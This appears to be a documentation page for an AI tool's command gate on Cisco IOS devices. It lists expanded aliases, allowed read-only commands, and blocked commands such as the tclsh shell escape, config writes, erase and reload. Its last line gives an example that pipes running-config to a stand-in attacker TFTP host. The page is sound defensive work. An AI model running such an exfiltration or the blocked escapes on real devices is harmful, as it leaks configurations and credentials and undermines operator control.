Cisco IOS

Classic Cisco IOS — switches and routers on the monolithic image line. Cisco IOS-XE shares ~95% of this surface; see its page for the platform-specific additions.

Shorthand expansion

Alias	Canonical
`sh`, `sho`, `shw`	`show`
`wr`, `wri`	`write`
`p`	`ping`
`tr`	`traceroute`

wr → write is critical — bare wr saves running-config to NVRAM, which is a config write that must be blocked. Without the alias, wr mem would slip past the write block.

Allowed (head)

show, ping, traceroute
dir — directory listing on flash:, disk0:, etc.
more — read-only file content
terminal length, terminal monitor, terminal no monitor — pager and log-echo control (no device state)
where — show outgoing connections (read-only)

Blocked (head)

Shell escapes — full gate bypass:

tclsh — built-in IOS Tcl shell
tclquit
event manager run — EEM applets can run arbitrary actions

Privileged-mode + configure:

enable, disable
configure, conf t

Saves and file mutations:

write — covers write, wr mem, wr terminal
copy — TFTP/FTP/etc copies + flash writes
delete, erase, format
archive — config archive
boot — alters boot variables

Reload / reset / clear:

reload, reset, clear

Session control:

logout, exit, quit, end

Pipe stages

Allowed: include, exclude, begin, section, count, format

Blocked:

redirect — writes output to a file or URL
tee — display AND save
append — appends output to a file

Without these, Transit AI would only inspect the first command — show running-config | redirect tftp://attacker/ would otherwise pass.